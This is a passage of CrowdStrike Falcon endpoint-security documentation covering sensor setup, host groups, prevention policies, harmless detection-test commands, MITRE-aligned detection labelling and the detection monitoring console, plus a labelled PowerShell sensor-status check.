        29. NetworkConnectIP6
        30. NetworkListenIP4
        31. NetworkListenIP6
        32. NetworkReceiveAcceptIP4
        33. NetworkReceiveAcceptIP6
        34. OsVersionInfo
        35. ProcessOpenedFileDescriptor
        36. ProcessRollup2
        37. RawBindIP4
        38. RawBindIP6
        39. RouteIP4
        40. RouteIP6
        41. UserAccount
        42. YARA
    7. On-Demand Scanning
      1. On-Demand Scanning
        1. On-Demand Scanning
        2. Requirements
        3. Before you begin
        4. Understanding on-demand scanning
          1. File quarantining
          2. Immediate versus scheduled scans
          3. Performance and CPU utilization
          4. End-user notifications
          5. Custom IOCs and exclusions
          6. On-demand scan event search
          7. Limitations and considerations
          8. End-user actions
        5. Setup
        6. On-demand scan management
          1. Get to on-demand scans
          2. Create a scan
          3. Duplicate an on-demand scan
          4. View on-demand scan logs
          5. View scheduled scans
          6. Export on-demand scan logs or scheduled scan info
          7. Cancel a running scan
          8. Delete a scheduled scan
          9. On-demand scan status values
          10. Exported file fields
        7. On-demand scanning CLI
      2. CrowdStrike Falcon Malware Scanning User Guide
        1. CrowdStrike Falcon Malware Scanning User Guide
        2. Understanding CrowdStrike Falcon malware scanning
          1. Quarantined files
        3. Running and managing scans
          1. Get to the CrowdStrike Falcon malware scanning menu
          2. Scan a specific file or folder
          3. Scan the full system drive
          4. Scan all local drives
          5. Pause or resume a scan
          6. Stop a scan
        4. Viewing scan status and results
          1. View scan status
          2. View scan results
          3. CrowdStrike Falcon malware scanning field reference
    8. Device Control, Firewall Management, and ZTA
      1. Device Control
        1. Overview
          1. Requirements
          2. Supported device types
          3. Limitations
          4. Before you begin
        2. Get started
          1. Plan and prepare
          2. Default configuration
            1. View Device Control policies
            2. Configure policy permissions for USB devices
            3. Assign a Device Control policy to host groups
          3. Test Device Control policies
        3. Device Control policies
          1. Manage Device Control policies
            1. Change Device Control policy precedence
            2. Enable a policy
            3. Duplicate a policy
            4. Edit a policy
            5. Disable a policy
            6. Delete a policy
          2. Device Control policies in multi-CID environments
        4. Device Control policy settings
          1. Configure USB Device Control settings
            1. File Types and Execution
            2. Block USB devices with multiple or composite classes
          2. Configure Bluetooth Device Control settings
            1. Full Disk Access is not enabled (macOS)
            2. Internal card reader returns multiple events (macOS)
          3. Configure PCIe Device Control settings
        5. Device Control policy exceptions
          1. Configure an exception for a USB device class
            1. Temporary exceptions
            2. Use wildcards to include multiple USB devices
          2. Configure an exception for a Bluetooth device class
          3. Configure an exception based on event type
          4. Configure a CID-wide USB device exception
        6. Monitor Device Control activity
          1. Activity dashboard
          2. Device usage
          3. Device events
          4. Device Usage by Host
          5. Device blocks dashboard
          6. Monitoring Policy Dashboard
          7. Mac bluetooth device usage dashboard
          8. Mac bluetooth device blocks dashboard
          9. Mac bluetooth monitoring policy dashboard
          10. Files written to removable media overview
          11. Files written to USB dashboard
        7. Use Device Control events as workflow triggers
        8. Troubleshooting
          1. Vendor name or product name are incorrect
          2. Device not supported event type
          3. Additional errors
      2. Falcon Firewall Management
        1. Overview
          1. Before you begin
          2. Requirements
        2. Understand Falcon Firewall Management
          1. Implementation overview
            1. Plan and prepare
            2. Create firewall rule groups and rules
            3. Create firewall policies
            4. Assign host groups and enable firewall policies
            5. Test and Troubleshoot
            6. Rollout/Go Live
        3. Manage your firewall rules and rule groups
          1. View your firewall rule groups and rules
          2. Create a firewall rule group
          3. Editing a firewall rule group’s basic info
          4. Create a firewall rule
          5. Edit a rule
          6. Firewall rule dialog fields
            1. Configure firewall rules for domain controller
          7. Custom network locations for Falcon Firewall Management rules
          8. Configure a custom rule
          9. Add a custom network location to a rule
          10. Firewall Rule ID and versions
          11. Firewall rules precedence
          12. Enable or disable firewall rule groups and rules
            1. Enable or disable rule groups
            2. Enable or disable rules
          13. Delete firewall rule groups
            1. Rule group
          14. Delete firewall rules
          15. Troubleshoot rule enforcement for macOS endpoints
          16. Audit changes to firewall rules and rule groups
        4. Manage your firewall policies
          1. About Falcon policies
          2. View your firewall policies
          3. Create a firewall policy
          4. Assign firewall rule groups to a firewall policy
          5. Edit firewall rule group precedence in a firewall policy
          6. Remove a firewall rule group from a firewall policy
          7. Configure firewall policy settings
            1. Firewall policy enforcement and monitoring
          8. Confirm an updated firewall policy or rule for macOS
            1. Default traffic rules
          9. Firewall Default Policy
          10. Editing firewall policy precedence
          11. Assign firewall policies
          12. Enable or disable a firewall policy
          13. Delete a firewall policy
        5. View Firewall Events
          1. Check compliance
          2. Network Auditing in Windows
          3. Confirm firewall policies on a macOS endpoint
          4. Confirm firewall policies on a Linux endpoint
        6. Support for advanced protocols on macOS hosts
        7. CrowdStrike Core Windows Networking Firewall Rules
      3. Zero Trust Assessment
        1. Overview
          1. Requirements
        2. Understanding Zero Trust Assessment
          1. Security score
          2. Security score caching
        3. Getting to the Zero Trust Assessment dashboard
        4. Working with Zero Trust Assessment information
          1. Viewing aggregate ZTA data
          2. Viewing ZTA data by host
        5. Understanding OS setting requirements
          1. Windows OS security settings
          2. macOS security settings
          3. Android OS security settings
          4. iOS OS security settings
        6. Integrating ZTA with partner apps
        7. Zero Trust Assessment workflows
          1. Before you begin
          2. Send notifications on host assessment changes
          3. Send notifications and open incidents when assessments fail
          4. Send notifications and open incidents on aggregate assessment
          5. Contain a host automatically

Endpoint Security

Monitor and protect your endpoints.

Endpoint Security provides a comprehensive cybersecurity approach to protect endpoints such as desktops, laptops, and mobile devices from malicious activities. It includes an endpoint protection platform (EPP) that detects and prevents security threats, offers investigation and remediation capabilities, and leverages advanced analytics to monitor network activity for indicators of compromise. The solution can be managed through a centralized console, supporting on-premises, cloud, or hybrid environments to ensure consistent security across all devices.

  • Endpoint Security: Create and manage prevention policies, exclusions, and custom IOCs and IOAs to control what activity is blocked, killed, quarantined, and allowed on your hosts.
  • Falcon Firewall Management: Centrally manage the firewalls on your Windows, macOS, and Linux hosts in the Falcon console.
  • Falcon Forensics: Collect forensic triage data from workstations and servers within your environment to perform incident response investigations, compromise assessments, and threat hunting.
  • On-Demand Scanning: Create on-demand scans that detect and quarantine portable executable (PE) files that contain dormant malware before they execute on Windows hosts.
  • Real Time Response: Connect to and run commands on hosts from the Falcon console, enabling incident response and remediation.
  • USB Device Control: Create device policies to gain visibility into and control over devices in your environment.
  • Zero Trust Assessment: Better understand the security posture of your organization's hosts through a granular assessment of their Operating System and sensor settings.

Start Up and Scale Up

Understand the basics of Falcon endpoint security, and what it takes to get it running.

About the Falcon platform

What is Falcon?

CrowdStrike Falcon is a SaaS-based, next-generation endpoint protection solution that provides advanced detection, prevention, monitoring, and search capabilities, allowing analysts to defend against sophisticated threats and adversaries.

Falcon offers remote visibility across endpoints throughout an environment, enabling instant access to the "who, what, when, where, and how" of an attack. We collect and analyze more than 80 billion endpoint events each day from millions of sensors deployed across 176 countries. Falcon can help you protect your endpoints, whether you have just a few or hundreds of thousands.

How does Falcon work?

Falcon consists of two components: the sensor and the cloud.

First, a lightweight sensor is deployed to every endpoint, where it gathers the relevant system events from each host and takes proactive detection and prevention actions. The Falcon sensor detects and defends against attacks occurring on disk and in memory. The platform continuously watches for suspicious processes, events, and activities, wherever they reside. Falcon also provides advanced prevention capabilities such as custom allow and block rules, malware blocking, exploit blocking, and prevention based on Indicators of Attack (IOAs).

Data gathered by the sensor is then transmitted continuously from the sensor to CrowdStrike’s Advanced Threat Intelligence Cloud, where CrowdStrike analyzes and draws links between events across the entire Falcon sensor community. These behavioral patterns are detected in real time using CrowdStrike’s Threat Graph data model, allowing analysts to detect new attacks, whether the attacks use malware or not.

CrowdStrike provides you a suite of powerful investigation, prevention, detection, and sensor monitoring tools in the Falcon web interface—your command center for everything to do with Falcon. See the Falcon Console User Guide for an app-by-app walkthrough.

What detection capabilities does Falcon have?

For known threats, Falcon provides cloud-based antivirus (Cloud AV) and Indicators of Compromise (IOC) detection capabilities. For unknown and zero-day threats, Falcon applies IOA detection, using machine learning techniques to build predictive models that can detect never-before-seen malicious activities with high accuracy. Driven by CrowdStrike’s Threat Graph data model, this IOA analysis recognizes behavioral patterns to detect new attacks.

What is the Falcon sensor?

The sensor takes only minutes to deploy to your endpoints, and analysts monitor and manage the environment through the Falcon web interface. With Falcon, there are no controllers to be installed, configured, updated, or maintained, and there is no on-premises equipment. Falcon is a 100% cloud-based solution, offering Security as a Service to users.

Does the sensor integrate with SIEM technology?

CrowdStrike sends events from the sensor to Falcon Next-Gen SIEM, bringing together threat detection, investigation, and response in one platform. For more info, see Next-Gen SIEM.

In addition, CrowdStrike provides the Falcon SIEM Connector, which allows you to send detections and audit events to your SIEM. The Falcon SIEM Connector integrates with HP ArcSight, IBM QRadar, and Splunk. CrowdStrike also offers the Streaming API to enable integration with third-party SIEMs. For more information, see SIEM Connector and Non-Sensor Events Reference.

What operating systems does Falcon support?

For the most up-to-date list of supported operating systems, see the Deployment Guides:

  • Falcon Sensor for Windows

  • Falcon Sensor for Mac

  • Falcon Sensor for Linux

  • Deploying Falcon for Mobile to iOS devices

  • Deploying Falcon for Mobile to Android devices

What data does Falcon send to the cloud?

The Falcon platform is designed to maximize visibility into real-time and historical endpoint security events by gathering the event data necessary to identify, understand, and respond to attacks — but nothing more. The amount of data that a sensor transmits to the cloud varies depending on each host’s activity.

The default set of system events that the sensor collects is focused on process execution and is continually monitored for suspicious activity. When such activity is detected, additional data collection is initiated to better understand the situation and enable a timely response to the event. The specific data collected changes as CrowdStrike advances its capabilities and in response to changes in the threat landscape.

How does Falcon safeguard customer data?

CrowdStrike uses a TLS-encrypted tunnel to send data between the sensor and the cloud.

Additionally, CrowdStrike uses certificate pinning on the sensor side. This means that a sensor only communicates with cloud endpoints that present a known certificate. CrowdStrike also gives you the ability to allowlist its cloud endpoints in your firewalls, so that your Falcon sensors communicate only with CrowdStrike.

Next, every customer is assigned a unique customer ID. Because CrowdStrike tags customer data with a unique customer ID, any query or exchange of data is limited to the scope of a specific customer ID, which further secures data.

All data in the CrowdStrike cloud, including backups, is encrypted with industry-standard AES-256 encryption.

CrowdStrike also limits employee access to customer data to individuals with a business need. This includes Customer Support and Falcon OverWatch. Moreover, direct access to the underlying systems is limited to engineers with a business need. Access is protected by encrypted VPN and multi-factor authentication.

Getting Falcon up and running

This high-level walkthrough guides you through a basic Falcon implementation for Windows, Mac, and Linux endpoints, from installing your first sensor to scaling up to your whole environment. For information about iOS and Android endpoint protection, see Deploying Falcon for Mobile to iOS devices and Deploying Falcon for Mobile to Android devices.

Before you begin

  • We recommend using Falcon as your only AV solution. Running more than one AV solution can cause unexpected results.

  • Have two devices:

    • A test device running Windows. You'll install the Falcon sensor on this device. For general use, Falcon also supports Mac and Linux devices.

    • A management device with Google Chrome. This device is used to access the Falcon console.

  • Set up your Falcon account, including two-factor authentication (2FA), using the link in your activation email.

Download and install the sensor

The Falcon sensor is a lightweight agent that you install on each device. When a device has a Falcon sensor installed, we call that device a host. Each sensor detects and prevents malicious activity on a host, according to the policies that you’ll configure later. You use the Falcon console to manage your hosts.

In this example process, download and manually install the Falcon sensor on your test device.

1. Download and run the sensor installer

Download and run the installer file for your test device’s operating system by following the procedure for that platform:

  • Windows: Manual installation

  • Mac:

    • Recommended installation method: Using an MDM to sync profiles

    • Alternative installation method: Installing without using an MDM to sync profiles

  • Linux: Deploy the Falcon sensor for Linux

2. Verify the sensor is running

  • Windows: Verifying sensor installation

  • Mac: Verifying sensor installation

  • Linux: Verifying sensor installation
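
For the Windows test device, the following added example (not CrowdStrike code or documentation) performs both halves of the verification from one place: it checks the user-mode sensor service and the kernel driver, and reports whether the sensor is healthy. It assumes the service name CSFalconService and the driver name csagent (the name used in the sc query csagent check), and that sc.exe is on the path.

```powershell
# Added example, not CrowdStrike code. Assumes the Windows sensor runs as the
# service "CSFalconService" and loads the kernel driver "csagent".
function Test-FalconSensorRunning {
    [CmdletBinding()]
    param(
        [string]$ServiceName = 'CSFalconService',  # user-mode sensor service (assumed name)
        [string]$DriverName  = 'csagent'           # kernel driver, as in "sc query csagent" (assumed name)
    )

    $result = [ordered]@{
        ServiceStatus    = 'Missing'
        ServiceStartType = 'Unknown'
        DriverState      = 'Missing'
        Healthy          = $false
    }

    # 1. The user-mode service should exist, be Running, and start automatically
    #    so the host stays protected across reboots.
    $svc = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue
    if ($svc) {
        $result.ServiceStatus    = $svc.Status.ToString()
        $result.ServiceStartType = $svc.StartType.ToString()
    }

    # 2. The kernel driver is queried through sc.exe; a healthy sensor prints a
    #    line such as "STATE : 4 RUNNING". Anything else (STOPPED, or no STATE
    #    line because the driver is absent) means the sensor is not protecting
    #    the host, even if the service shows as Running.
    $scOutput  = & sc.exe query $DriverName 2>&1
    $stateLine = $scOutput | Where-Object { $_ -match '^\s*STATE\s*:' } | Select-Object -First 1
    if ($stateLine -and $stateLine -match 'STATE\s*:\s*\d+\s+(\w+)') {
        $result.DriverState = $Matches[1]
    }

    $result.Healthy = ($result.ServiceStatus -eq 'Running') -and
                      ($result.DriverState -eq 'RUNNING')

    [pscustomobject]$result
}

# Run the check and show each field; Healthy = True means both components are up.
Test-FalconSensorRunning | Format-List
```

On Mac and Linux test devices the sensor ships a falconctl utility for the equivalent status check; follow the platform-specific verification procedures linked above.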

3. Scale up

Learn about deploying at scale, using tools like SCCM or JAMF, configuring images for cloning, and more from our full deployment guides:

  • Falcon Sensor for Windows

  • Falcon Sensor for Mac

  • Falcon Sensor for Linux

Set up a host group

Groups are collections of hosts in your organization. Using groups, you can control endpoint protection and sensor upgrades for each of your hosts. For example, you might create separate groups for servers, general users' devices, and your executives' devices.

In this example, create a group and assign your host by platform.

1. Create a host group
  1. In the Falcon console, go to Host groups (Host setup and management > Manage endpoints > Host groups).

  2. Click Add New Group in the upper-right corner.

  3. Enter a name and an optional description.

  4. Select Dynamic as your group type. This means the group automatically adds new hosts when they match the group's assignment rule.

2. Put a host in the group

In your host group’s details:

  1. Click Edit near Assignment rule.

  2. In the OS Version column of the filter bar, select your host’s operating system. When you do, the host is added to the list of Hosts for this group.

  3. Click Save in the upper-right corner.

3. Scale up

Host groups are essential when your environment has dozens (to hundreds of thousands) of hosts. Read Host and Host Group Management for information about:

  • Assigning hosts to dynamic groups using other attributes, such as their Organizational Unit (OU) in Active Directory

  • Assigning hosts to static groups by manually selecting them

Use host groups to keep your hosts running up-to-date sensor versions. Read Sensor Update Policies for more information.

Review the default prevention policy

Prevention policies are sets of rules that control how Falcon responds to potentially malicious activity identified by your sensors.

1. Go to the Default Policy

When you created your group, Falcon automatically assigned it to use the Default Policy, which is detection only: matching activity is detected and reported, but nothing is blocked until you enable prevention settings. Review the default policy using the Falcon console:

  1. Go to Prevention Policies (Endpoint security > Configure > Prevention policies).

  2. Click Default Policy.

You can examine the controls in the Default Policy to understand its settings. Later, you can create your own policies to be as cautious or as aggressive as your environment requires.

2. Scale up

When you have many groups, you want more fine-tuned control over the detections and preventions triggered on your hosts. This introductory guide shows you how to start small with Falcon, but Falcon can detect and prevent much more sophisticated attacks on all the endpoints in your environment. Read Detection and Prevention Policies for more information about configuring prevention policies and custom detection and prevention settings:

  • File Exclusions

  • Prevention Hashes

  • Custom IOA Rules

Watch the sensor detect an event

Falcon sensors detect malicious activity, respond according to your policies, and report the activity to the CrowdStrike Cloud. You can see information on this malicious activity in the Falcon console.

1. Run a simulated attack

To see an example of what a detection looks like, run a simulated but harmless attack on your host:

  1. Open a command prompt.

  2. Run each applicable command:

    • Windows:

      • cmd crowdstrike_test_critical

      • cmd crowdstrike_test_high

      • cmd crowdstrike_test_medium

      • cmd crowdstrike_test_low

      • cmd crowdstrike_test_informational

    • macOS and Linux:

      • For most shell environments, use these commands:
        • sh -c crowdstrike_test_critical

        • sh -c crowdstrike_test_high

        • sh -c crowdstrike_test_medium

        • sh -c crowdstrike_test_low

        • sh -c crowdstrike_test_informational

        Note: If you see the error crowdstrike_test_high: not found, you can safely ignore it. This is expected behavior and does not affect the test detection being triggered.
      • For the dash shell environment, or if the sh -c commands don't work in your environment, use these commands:

        • bash crowdstrike_test_critical

        • bash crowdstrike_test_high

        • bash crowdstrike_test_medium

        • bash crowdstrike_test_low

        • bash crowdstrike_test_informational

        Note: If you see the error crowdstrike_test_high: No such file or directory, you can safely ignore it. This is expected behavior and does not affect the test detection being triggered.
2. View the detection

Return to the Falcon console on your management device to see that the Falcon sensor detected this attack.

  1. Go to Endpoint detections (Endpoint security > Monitor > Endpoint detections) on your management device.

  2. Click the line item for the detection you triggered.

Review a summary of the event and investigate the sequence of events on your host that led to the attack.

3. Scale up

You can also simulate a unique, non-malicious ransomware over SMB attack, to help prevent future attacks. For more info, see Demonstrate File System Containment With a Simulated Ransomware Attack.

Read About Endpoint Monitoring for more about understanding the detections and preventions in your environment.

Read Falcon Notifications to learn about the options available to have Falcon let you and other members of your organization know about things like incidents, detections, policy changes, and more. This is helpful for staying up to date even when you're not logged into the Falcon console.

More info

MITRE-Based Falcon Detections Framework

Learn about how CrowdStrike labels detections in alignment with the MITRE ATT&CK matrix and Falcon Detection Methods.

Overview

CrowdStrike is aligned with MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) matrix to label our detections and related supporting events. ATT&CK is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risks against known adversary behavior, planning security improvements, and verifying that defenses work as expected.

About objective, tactic, technique, sub-technique, and description

We label each detection and related supporting event with a tactic and technique/sub-technique combination, characterizing and describing what the adversary is trying to do and what they’re using to do it. We also include additions that build on ATT&CK.

  • Our Objective layer: Groups related tactics, making them easier to learn and remember.

  • Our detection description: Even more specific than technique/sub-technique, it states what triggered that detection, explains why it’s considered a problem, and suggests how to start investigating.

  • Tactic, technique, and sub-technique align with the MITRE ATT&CK Framework. In the Falcon console, technique and sub-technique are used interchangeably. Sub-techniques are displayed in place of technique when applicable.

Together they provide this comprehensive view:

  • The adversary is trying to <objective> by <tactic> using <technique/sub-technique>.

  • <Activity> happened.

  • Possibly <intent>.

  • Start investigating by <action>.

For example:

  • The adversary is trying to keep access by defense evasion using process hollowing.

  • A system process appears to have been hijacked by malware, likely through injection or hollowing.

  • The process will likely attempt to contact external infrastructure or download a malicious payload.

  • Investigate the process tree.

About the Falcon Detection Methods matrices

Falcon can detect and prevent activities that don’t map directly to the ATT&CK matrix, so we created the Falcon Detection Methods (FDM) matrix to provide useful information for them. The FDM tactics and techniques highlight behavior that we consider suspicious and malicious, and worth investigating. It’s not an exact parallel to ATT&CK, but we keep that structure to match workflows with the ATT&CK-aligned detections.

Most closely aligned are the Malware, Exploit, and Post-Exploit tactics and techniques. They’re areas that MITRE doesn’t yet include in the ATT&CK matrix.

  • Malware -- Broad category for all software intended to cause harm; such software can be identified and prevented based on its hash or file.

  • Exploit -- Exploit Mitigation

  • Post-Exploit -- Malicious Tool Delivery, Malicious Tool Execution, Command-Line Interface

The others reflect how CrowdStrike Falcon detects activities.

  • Machine Learning -- Detected by our next-gen antivirus/anti-malware solution, controlled by settings in Endpoint security > Configure > Prevention policies.

  • Falcon OverWatch -- For OverWatch customers. Our OverWatch team identified activity that they consider suspicious or malicious. These alerts are marked with a black falcon badge, and should always be investigated.

  • Falcon Intel -- For Falcon Intelligence customers. Indicates activity that matches known adversary behavior.

  • Custom Intelligence -- If you use our Query API to create a custom IOC, those detections have this tactic with an Indicator of Compromise technique.

Falcon Detections Methods tactics and techniques

The FDM Matrix for Enterprise covers Windows, Mac, and Linux.

  • Malware: Known Hash, Destructive Malware, Malicious File, Adware, PUP

  • Exploit: Exploit Mitigation

  • Post-Exploit: Malicious Tool Delivery, Malicious Tool Execution, Command-Line Interface

  • Machine Learning: Cloud-based ML, Sensor-based ML, Adware/PUP, Malicious File

  • Custom Intelligence: Indicator of Compromise, Indicator of Attack

  • Falcon OverWatch: Suspicious Activity, Malicious Activity, Malicious File

  • Falcon Intel: Attributed to Adversary, Intelligence Indicator - Hash, Intelligence Indicator - Domain

  • AI Powered IOA: User Execution, Command and Scripting Interpreter, Reflective Code Loading

The FDM Matrix for Mobile covers iOS and Android.

  • Malware: Known Hash, Destructive Malware, Malicious File, Adware

  • Exploit: Exploit Mitigation

  • Post-Exploit: Malicious Tool Delivery, Malicious Tool Execution, Command-Line Interface

  • Machine Learning: Cloud-based ML, Sensor-based ML, Adware/PUP

  • Custom Intelligence: Indicator of Compromise, Indicator of Attack

  • Falcon OverWatch: Suspicious Activity, Malicious Activity, Malicious File

  • Falcon Intel: Attributed to Adversary, Intelligence Indicator - Hash, Intelligence Indicator - Domain, Intelligence Indicator - IP

  • Insecure Security Posture: Bad Device Settings, Bypass Monitoring

ATT&CK Matrix for Enterprise

The full ATT&CK Matrix for Enterprise includes techniques/sub-techniques spanning Windows, Mac, and Linux platforms. For more info, see the ATT&CK Matrix for Enterprise on the MITRE site.

ATT&CK Matrix for Mobile

The full ATT&CK Matrix for Mobile includes techniques spanning iOS and Android platforms. For more info, see the ATT&CK Matrix for Mobile on the MITRE site.

Copyright © 2021, The MITRE Corporation. ATT&CK and ATT&CK Matrix are trademarks of The MITRE Corporation.

Endpoint Monitoring

Understand and work through detections and incidents. Review quarantined files and remediations.

About Endpoint Monitoring

Monitor and understand your organization’s overall safety and take faster action against advanced threats on your hosts.

Overview

The Falcon console provides information to help you understand your organization’s overall safety and take faster action against advanced threats on your hosts.

  • Prioritize incidents for investigation. Incidents, a more comprehensive approach to identifying possible attacks, are made up of related detections and processes. They also include contextual detections not shown in Endpoint security > Monitor > Endpoint detections.

  • Monitor endpoint detections to understand the processes within individual suspicious files or behaviors.

  • View, manage, and release quarantined files.

  • View the remediation actions that the Falcon platform has taken on detections.

For information about detection monitoring, see Detection Monitoring and Incident Investigation.

For information about monitoring activity in the unified detections view, see Detection Monitoring.


Requirements

  • Subscription: Falcon Insight XDR, Falcon for Mobile (Falcon Prevent required for preventions)

  • Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux

    • Incidents and Detections in Endpoint Security: All supported versions of Falcon sensor for macOS, Windows, and Linux

    • Mobile detections: All supported versions of the CrowdStrike Falcon apps for iOS and Android

  • System requirements: None

  • Roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections and incidents. For full details about the roles required to perform specific actions on detections and incidents, see Roles for Falcon Insight Next-Gen SIEM.

Understanding the information in Endpoint detections

What’s the relationship between events, detections, and incidents?

Falcon monitors activity in your environment to identify suspicious files and behaviors. All of the collected data can be observed as events in Investigate. When a collection of events is considered noteworthy, likely because it's suspicious or malicious, the sensor triggers a detection. Adjust the detections you see through your prevention policy settings. Incidents bring together related detections, associated processes, and the connections between them to show coordinated activity you should prioritize for investigation.

Understanding incidents

Incidents are made of detections, associated processes, and the connections between them, which can include parent-child relationships, thread injections, and lateral movement. Because attacks often consist of coordinated activity happening together on one or more hosts, incidents help you see important and relevant information more quickly.

Incidents can include, or be entirely composed of, detections that aren’t shown in Endpoint security > Monitor > Endpoint detections. Though these contextual detections don’t meet a threshold of significance for all environments on their own, the context of their relationship to the rest of the incident and how noteworthy they are to your organization mean they might be key pieces of an attack.

Not all detections shown in Endpoint security > Monitor > Endpoint detections are involved in incidents.

Understanding detections

The Falcon console provides information about suspicious files and behaviors in the form of individual detections. Detections can alert you to a wide variety of activities that are occurring on your hosts, from the presence of a bad file in the form of an indicator of compromise (IOC) to a nuanced collection of suspicious behaviors in the form of an indicator of attack (IOA).

Most detections are triggered based on your prevention policy settings. If you have Falcon Prevent, your prevention policies also control which detected activities are prevented. For more info about how Falcon determines when to alert you about detections, see How detections are recorded.

MITRE-Based Falcon Detection Framework

CrowdStrike aligns with MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) matrix to label our detections. ATT&CK is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risks against known adversary behavior, planning security improvements, and verifying defenses work as expected.

Tactic and technique details are provided for each Falcon detection to help you understand security risks against known adversary behavior, plan for security improvements, and verify your defenses work as expected. Our objective layer groups related tactics to make them easier to understand, remember, and visualize in the console.

The Falcon Detection Methods (FDM) matrix provides useful information about activities that don’t map directly to the ATT&CK matrix. The FDM tactics and techniques highlight behavior we consider suspicious and malicious, and worth investigating. It’s not an exact parallel to ATT&CK, but that structure is used to match workflows with the ATT&CK-aligned detections. Read more about objectives, tactics, and techniques in MITRE-Based Falcon Detections Framework.

Endpoint Detection Monitoring

In the new endpoint detections experience, monitor detections to understand the activity happening in your environment.

Overview

Monitor endpoint detections to understand the activity happening in your environment. View detailed information about suspicious processes, files, behaviors, and on-demand scan results.

Endpoint detections are also available in the unified detections view. For more info, see Detection Monitoring.

Requirements

  • Subscription: Falcon Insight XDR (Falcon Prevent required for preventions)

  • Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux

  • System requirements: None

  • Default roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections. For full details about the roles required to perform specific actions on detections, see Roles for Falcon Insight Next-Gen SIEM.

Understanding endpoint detections

The Falcon console provides information about suspicious files and behaviors in the form of individual detections. Detections can alert you to a wide variety of activities that are occurring on your hosts, from the presence of a bad file in the form of an indicator of compromise (IOC) to a nuanced collection of suspicious behaviors in the form of an indicator of attack (IOA).

Most detections are triggered based on your prevention policy settings. If you have Falcon Prevent, your prevention policies also control which detected activities are prevented. For more info about how Falcon determines when to alert you about detections, see How detections are recorded.

Note: CrowdStrike keeps detection data in the cloud for 90 days, after which some of the data gets purged from the database.

Incident involvement

If a detection is part of an incident, the detection’s Related incident attribute includes a link to the full incident.

Working through an endpoint detection

For endpoint detections on Windows, macOS, and Linux hosts, Falcon provides information in the Activity app at Endpoint security > Monitor > Endpoint detections. Multiple viewing options help you understand the actions that an adversary might be taking in your environment.

Important: Container drift detections do not appear on the Endpoint detections page. To see detected container drifts, go to Cloud security > Detections > Containers, then click Drift indicators. To review excluded container drift events, see Review excluded container drift events.

For cloud hosts protected by CrowdStrike Cloud Security Posture Management (CSPM), the Activity app also displays indicators of misconfiguration (IOM) found by cloud security posture checks, so the info panel shows findings from both the agent-based (sensor) and agentless (CSPM) sides for the same host.

The Activity dashboard provides the information from a high-level view of your environment.

  • Review the Most recent detections area for a quick view of recent detections. Objective icons show the severity of the detection and whether the activity was blocked, killed, or is an OverWatch alert.

  • Look at the Detections by tactics graph to see the tactics identified in your environment over the past 30 days to help identify trends. Roll over the bars in the graph to see quick details.

Filter, sort, and group detections

A typical workflow in the Activity app starts on the Endpoint detections page. Go to Endpoint security > Monitor > Endpoint detections.

By default, all detections are shown and are sorted by time, from newest to oldest. Narrow down and refine your view by filtering, sorting, and grouping detections. The available options vary by detection type.

Tip: Hover over any detection row to quickly filter, sort, and group detections.

  • Filter: Apply one or more filters to show only the types of detections that you want to see. For example, filter the view to show only detections with a Severity value of Critical from the last hour.

  • Sort: Organize the visible detections by multiple criteria in ascending or descending order. For example, sort the visible detections by Time from newest to oldest.

  • Group: Organize the visible detections into logical groupings. For example, group detections by Host. Click a group to expand it and view the individual detections.

Tip: If you prefer an aggregated view that’s similar to the legacy endpoint detections experience, you can group detections by process tree or enable the Aggregate detections toggle. Both options produce the same detection grouping, but using the Aggregate detections toggle allows you to also group by another attribute.

Note: On-demand scan detections and other non-process detections aren’t shown when detections are grouped by process tree.

Show or hide table columns by clicking Configure table columns.

Configure detection attributes

Customize detection attributes to adjust what information appears in the list of detections, helping you triage detections more quickly and easily. For more info, see Detection Attribute Management.

View more details about a detection

Click a detection row to view the detection’s process table and summary information. The process table shows an expanded view of all processes involved in the detection and indicates which process triggered the detection. Where applicable, each indicator of suspicious behavior is presented as an associated detection.

In the summary panel, view more information about the detection in the expandable and collapsible sections. The specific sections and information shown vary by detection type and Falcon subscription. Examples of the types of information that might be shown in the summary panel:

  • General information about the detection and the host involved

    Note: Detections from on-demand scans contain Scanned file information instead of Process information.
  • The commands, executables, and files involved, including an explanation of the command's behavior and effects, powered by Charlotte AI

  • The tactics, techniques, and objectives that were used

  • The associated hashes

  • Which prevention actions, if any, were taken

  • Which files were quarantined, if applicable

  • Network-based indicators and DNS requests

  • Vulnerabilities that are present on an associated host. View the host’s risk posture at a high level alongside detection-specific info. Go to view more detailed vulnerability info from Falcon Spotlight.

  • Misconfigurations that are present on a specific cloud-based host. Go to view more detailed misconfiguration info from Cloud Security Posture Management.

  • CrowdStrike Intelligence indicators of compromise (IOCs), such as IP addresses, file hashes, domains, URLs, or actor IDs. These IOCs appear for first-party detections that originate from CrowdStrike, third-party detections, and detections generated by correlation rules.

In the summary view, click See full detection to view all detection details. See more detection details in multiple views:

  • Details: More detailed information about the detection. This view also includes a status log for the detection.

  • Process table: A table view of the processes associated with the detection, with the first associated process shown at the top of the table. Refine the view by showing and hiding layers. You can show and hide the legend and summary panel.

  • Process tree: A graph view of the processes associated with the detection. Each node in the process tree represents a process. Hover over or click a node to see additional details. Refine the view by showing and hiding layers. You can show and hide the legend and summary panel. For more info, see Process tree.

  • Events timeline: A list of all relevant events in chronological order. Refine the view by showing and hiding layers. You can show and hide the legend and summary panel.

Process tree

In the Process tree view, each node in the graph represents a process.

You can interact with and customize the graph in multiple ways:

  • View the big picture by zooming out, or view more detailed info by zooming in.

  • View available layers in the Legend area. Refine your view by showing or hiding layers. You can hide and show the legend.

  • Quickly see high-level process info by hovering over a node.

  • View more detailed process info by clicking a node. A process summary panel shows more info about network operations, registry operations, disk operations, command line history, and more. You can hide and show the process summary panel.

  • Show and hide child processes by clicking Load more and Collapse .

  • Refine the graph view by selecting a node and then clicking Prune to selection.

  • Hide all child elements of a node by selecting the parent node and then clicking Delete branches.

  • Undo or redo actions as needed.

  • Download a snapshot of the current graph view in PNG format.

